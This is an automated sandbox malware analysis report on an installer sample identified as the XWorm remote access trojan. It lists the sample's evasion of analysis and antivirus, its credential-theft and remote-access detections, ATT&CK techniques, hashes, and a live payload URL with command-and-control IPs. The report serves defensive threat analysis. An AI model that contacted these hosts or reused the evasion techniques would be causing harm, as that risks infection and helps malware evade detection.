            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\31__Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\31__Installer.exeMemory allocated: 3030000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeMemory allocated: 31E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeMemory allocated: 51E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeWindow / User API: threadDelayed 2118Jump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeWindow / User API: threadDelayed 7723Jump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exe TID: 932Thread sleep time: -9223372036854770s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exe TID: 2444Thread sleep count: 2118 > 30Jump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exe TID: 2444Thread sleep count: 7723 > 30Jump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 31__Installer.exe, 00000000.00000003.1678316988.000000000097E000.00000004.00000020.00020000.00000000.sdmp, 31__Installer.exe, 00000000.00000002.3816556651.000000000097E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn?
            Source: 31__Installer.exe, 00000000.00000002.3816556651.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, 31__Installer.exe, 00000000.00000003.1678316988.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, 31__Installer.exe, 00000000.00000003.1434298449.00000000009A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: 31__Installer.exe, 00000000.00000002.3816556651.000000000096C000.00000004.00000020.00020000.00000000.sdmp, 31__Installer.exe, 00000000.00000003.1678316988.000000000096C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\31__Installer.exeAPI call chain: ExitProcess graph end nodegraph_0-26959
            Source: C:\Users\user\Desktop\31__Installer.exeAPI call chain: ExitProcess graph end nodegraph_0-26774
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003E65D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_003E65D1
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003F40E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_003F40E4
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_02FA1628 mov eax, dword ptr fs:[00000030h]0_2_02FA1628
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003F7CB1 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_003F7CB1
            Source: C:\Users\user\Desktop\31__Installer.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003E65D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_003E65D1
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003EA71E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003EA71E
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003EC71D SetUnhandledExceptionFilter,0_2_003EC71D
            Source: C:\Users\user\Desktop\31__Installer.exeMemory allocated: page read and write | page guardJump to behavior
            Source: 31__Installer.exe, 00000000.00000002.3819907463.0000000003585000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: 31__Installer.exe, 00000000.00000002.3819907463.0000000003585000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
            Source: 31__Installer.exe, 00000000.00000002.3819907463.0000000003585000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: 31__Installer.exe, 00000000.00000002.3819907463.0000000003585000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003E1671 cpuid 0_2_003E1671
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_003EF825
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: GetLocaleInfoA,0_2_003F4859
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_003EF8E5
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_003EF94C
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_003EF988
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,0_2_003EDBBB
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_003EEC3A
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_003EF45D
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,0_2_003F44BA
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_003EF552
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_003F4594
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,0_2_003EF5F9
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_003EF654
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_003EEF28
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_003EDFDE
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,0_2_003E5FC5
            Source: C:\Users\user\Desktop\31__Installer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003E41BA GetSystemTimeAsFileTime,__aulldiv,0_2_003E41BA
            Source: C:\Users\user\Desktop\31__Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: 31__Installer.exe, 00000000.00000003.1678316988.000000000097E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\31__Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0.2.31__Installer.exe.5450000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.31__Installer.exe.5450000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.3820992471.0000000005450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.3819907463.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 31__Installer.exe PID: 7148, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0.2.31__Installer.exe.5450000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.31__Installer.exe.5450000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.3820992471.0000000005450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.3819907463.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 31__Installer.exe PID: 7148, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Process Injection
            1
            Masquerading
            OS Credential Dumping1
            System Time Discovery
            Remote Services11
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory141
            Security Software Discovery
            Remote Desktop ProtocolData from Removable Media11
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)131
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared Drive2
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Process Injection
            NTDS131
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            Application Window Discovery
            SSHKeylogging12
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information
            Cached Domain Credentials34
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Software Packing
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            31__Installer.exe21%ReversingLabs
            31__Installer.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://guanlix.cn:881/31.ccpG0%Avira URL Cloudsafe
            156.238.235.310%Avira URL Cloudsafe
            http://guanlix.cn:881/31.ccp100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            guanlix.cn
            91.208.240.157
            truefalse
              unknown
              56.126.166.20.in-addr.arpa
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                156.238.235.31true
                • Avira URL Cloud: safe
                unknown
                http://guanlix.cn:881/31.ccpfalse
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name31__Installer.exe, 00000000.00000002.3819907463.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://guanlix.cn:881/31.ccpG31__Installer.exe, 00000000.00000003.1678316988.000000000097E000.00000004.00000020.00020000.00000000.sdmp, 31__Installer.exe, 00000000.00000002.3816556651.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                156.238.235.31
                unknownSeychelles
                394281XHOSTSERVERUStrue
                91.208.240.157
                guanlix.cnunknown
                139659LUCID-AS-APLUCIDACLOUDLIMITEDHKfalse
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1466311
                Start date and time:2024-07-02 19:22:07 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 43s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:31__Installer.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/2@2/2
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 28
                • Number of non-executed functions: 33
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: 31__Installer.exe
                TimeTypeDescription
                13:23:03API Interceptor8606058x Sleep call for process: 31__Installer.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                156.238.235.3131-o_Installer.exeGet hashmaliciousXWormBrowse
                  91.208.240.157103-o_Installer.exeGet hashmaliciousXWormBrowse
                  • guanlix.cn:881/103.ccp
                  31-o_Installer.exeGet hashmaliciousXWormBrowse
                  • guanlix.cn:881/31.ccp
                  33-o_Installer.exeGet hashmaliciousXWormBrowse
                  • guanlix.cn:881/33.ccp
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  guanlix.cn103-o_Installer.exeGet hashmaliciousXWormBrowse
                  • 91.208.240.157
                  31-o_Installer.exeGet hashmaliciousXWormBrowse
                  • 91.208.240.157
                  33-o_Installer.exeGet hashmaliciousXWormBrowse
                  • 91.208.240.157
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  XHOSTSERVERUS31-o_Installer.exeGet hashmaliciousXWormBrowse
                  • 156.238.235.31
                  arm5-20240623-2204.elfGet hashmaliciousMiraiBrowse
                  • 156.238.223.103
                  H34bnq1S0l.elfGet hashmaliciousMiraiBrowse
                  • 156.238.223.119
                  armv6l.elfGet hashmaliciousMirai, GafgytBrowse
                  • 156.238.223.141
                  hmips-20240612-1156.elfGet hashmaliciousMiraiBrowse
                  • 156.254.22.229
                  skt.m68k.elfGet hashmaliciousMiraiBrowse
                  • 156.238.223.104
                  4JsnDtTGF3.exeGet hashmaliciousLimeRATBrowse
                  • 156.238.224.215
                  bPOGt24Mub.elfGet hashmaliciousMiraiBrowse
                  • 156.231.2.118
                  9XzxoGb2mX.elfGet hashmaliciousMiraiBrowse
                  • 156.254.22.242
                  2BVJRatDwx.elfGet hashmaliciousGafgyt, MiraiBrowse
                  • 156.254.22.237
                  LUCID-AS-APLUCIDACLOUDLIMITEDHK103-o_Installer.exeGet hashmaliciousXWormBrowse
                  • 91.208.240.157
                  31-o_Installer.exeGet hashmaliciousXWormBrowse
                  • 91.208.240.157
                  33-o_Installer.exeGet hashmaliciousXWormBrowse
                  • 91.208.240.157
                  https://telegram-wv.icu/Get hashmaliciousUnknownBrowse
                  • 103.143.81.212
                  #U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exeGet hashmaliciousUnknownBrowse
                  • 45.136.13.176
                  #U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exeGet hashmaliciousUnknownBrowse
                  • 45.136.13.176
                  CXM5Rc4W2k.exeGet hashmaliciousGhostRatBrowse
                  • 103.143.81.180
                  CXM5Rc4W2k.exeGet hashmaliciousGhostRatBrowse
                  • 103.143.81.180
                  dllhostpgd.exeGet hashmaliciousCobaltStrikeBrowse
                  • 45.136.14.159
                  dllhostpgd.exeGet hashmaliciousCobaltStrikeBrowse
                  • 45.136.14.159
                  No context
                  No context
                  Process:C:\Users\user\Desktop\31__Installer.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):71938
                  Entropy (8bit):7.605549717634749
                  Encrypted:false
                  SSDEEP:1536:7rOXXfr0QSEEQrLQDcbAbmYcOM6eKXBwLsy1ETqfvu+P4Rtsj5o:WfwQPEQPJbAbmYrMRKXBwLs/
                  MD5:0773F13D8E171C40379FE891118B7379
                  SHA1:ABBE3F022B28A7BBBA7A9AECA45E183261D5D0E5
                  SHA-256:115771EA79888FA4FFD6085DEC01446CC14753BA4A89F87248FDEA468B08708E
                  SHA-512:8679F7FB8AF7560084E5F44A2839AF884912F0E5A9A6B3E5F79621194879EBAA9C252F270C1107F56276E9E0ACD5E0EBEF4B4A04B5293FC5A2C1240FD470CA05
                  Malicious:false
                  Yara Hits:
                  • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\Public\Downloads\ind.jpg, Author: unknown
                  Reputation:low
                  Preview:.........z.......l.....,../z.N...xC.!....x\.G6.K..8L.S.D.*q.-.r.zd......6..".g..`.*-S }...m..V.q.%."(.uA..\.;..... .z...-~8.1....Qn...ko'.v..T....G.n..c..HW.J..H?..tE.Y..|...O.R...$8.C.V.9..q..DV.p.Y.[X.....B..u.z..)....~;.....D0..R.....@..Dt..(Q..2,.{G&......8LKy..hp...".Fn\..x.`..........b...6*.=y.B..........................................................................................................................................................................................................................................................]..........t.<.b...........fc.Gl.K./..a.;..{....q....0.*.RC.K\.......8e.......1.[...&../$._.6.....Y9M.s.c5.5...G.{.#.'&.O...8e.@)m.e.......J.....a...3....k.....Q\KAx.Vp7S.T.$f.4....w.zde8.....[C....OI2+..3].M....O.E.u ...4....M.......Im_..'F..{:^..N*.A..gCG.-.;.f....R....o...,v:-.D..d.....ad.....e.N{5(4.[.TXE..-...E?.K.V......T..O.F.v.9.i&O .p...M.l..2l....Jdi5..^J.._Y....O...\A.C..SBX.S.n..J..i...+'..|
                  Process:C:\Users\user\Desktop\31__Installer.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):71938
                  Entropy (8bit):7.605549717634749
                  Encrypted:false
                  SSDEEP:1536:7rOXXfr0QSEEQrLQDcbAbmYcOM6eKXBwLsy1ETqfvu+P4Rtsj5o:WfwQPEQPJbAbmYrMRKXBwLs/
                  MD5:0773F13D8E171C40379FE891118B7379
                  SHA1:ABBE3F022B28A7BBBA7A9AECA45E183261D5D0E5
                  SHA-256:115771EA79888FA4FFD6085DEC01446CC14753BA4A89F87248FDEA468B08708E
                  SHA-512:8679F7FB8AF7560084E5F44A2839AF884912F0E5A9A6B3E5F79621194879EBAA9C252F270C1107F56276E9E0ACD5E0EBEF4B4A04B5293FC5A2C1240FD470CA05
                  Malicious:false
                  Yara Hits:
                  • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\31[1].ccp, Author: unknown
                  Reputation:low
                  Preview:.........z.......l.....,../z.N...xC.!....x\.G6.K..8L.S.D.*q.-.r.zd......6..".g..`.*-S }...m..V.q.%."(.uA..\.;..... .z...-~8.1....Qn...ko'.v..T....G.n..c..HW.J..H?..tE.Y..|...O.R...$8.C.V.9..q..DV.p.Y.[X.....B..u.z..)....~;.....D0..R.....@..Dt..(Q..2,.{G&......8LKy..hp...".Fn\..x.`..........b...6*.=y.B..........................................................................................................................................................................................................................................................]..........t.<.b...........fc.Gl.K./..a.;..{....q....0.*.RC.K\.......8e.......1.[...&../$._.6.....Y9M.s.c5.5...G.{.#.'&.O...8e.@)m.e.......J.....a...3....k.....Q\KAx.Vp7S.T.$f.4....w.zde8.....[C....OI2+..3].M....O.E.u ...4....M.......Im_..'F..{:^..N*.A..gCG.-.;.f....R....o...,v:-.D..d.....ad.....e.N{5(4.[.TXE..-...E?.K.V......T..O.F.v.9.i&O .p...M.l..2l....Jdi5..^J.._Y....O...\A.C..SBX.S.n..J..i...+'..|
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):5.938021095236715
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:31__Installer.exe
                  File size:249'344 bytes
                  MD5:cc1bb6a11aa1706bcbc42f04d1b1d865
                  SHA1:b4555a73799aa255c431c227db3958e6286d6977
                  SHA256:96d3ad9b885e0a57a37a84582d6a681f98d5e71b11e952082a7b610026198b00
                  SHA512:13bd5158d2dbb7a6f621a4d36be93e897eee5cad20fbe8a6b16e45ae0d40f8051d697a3ea1d14510c2e4aad69160a74d83144838a4216dc814946d5c540acdbc
                  SSDEEP:3072:JPl4G474Poo9JkbXjEU+QVUjsbC8g2SbAe4ZQeAnuTCt2xbzmyoaq6rcYsc8kOeu:JPW745r2XgUsjsbIZnjZ2x4
                  TLSH:F4345B92F6C0D4B6D8170175983ACEB2126BBE798974110B36E9372F5EB72831937E07
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.q>...m...m...mj..m...mj..m...m...m...m...m_..mj..m1..mj..m...mj..m...mRich...m........PE..L....b.f.................v...T.....
                  Icon Hash:20246c0c56e20926
                  Entrypoint:0x405b41
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Time Stamp:0x668362B3 [Tue Jul 2 02:15:15 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:0b47c746b58dc722dcec07246158fda2
                  Instruction
                  call 00007F62F0CF6975h
                  jmp 00007F62F0CEF44Eh
                  mov edi, edi
                  push ebp
                  mov ebp, esp
                  mov eax, dword ptr [ebp+08h]
                  test eax, eax
                  je 00007F62F0CEF5D4h
                  sub eax, 08h
                  cmp dword ptr [eax], 0000DDDDh
                  jne 00007F62F0CEF5C9h
                  push eax
                  call 00007F62F0CEDEAFh
                  pop ecx
                  pop ebp
                  ret
                  mov edi, edi
                  push ebp
                  mov ebp, esp
                  mov eax, dword ptr [ebp+08h]
                  push esi
                  mov esi, ecx
                  mov byte ptr [esi+0Ch], 00000000h
                  test eax, eax
                  jne 00007F62F0CEF625h
                  call 00007F62F0CF31DEh
                  mov dword ptr [esi+08h], eax
                  mov ecx, dword ptr [eax+6Ch]
                  mov dword ptr [esi], ecx
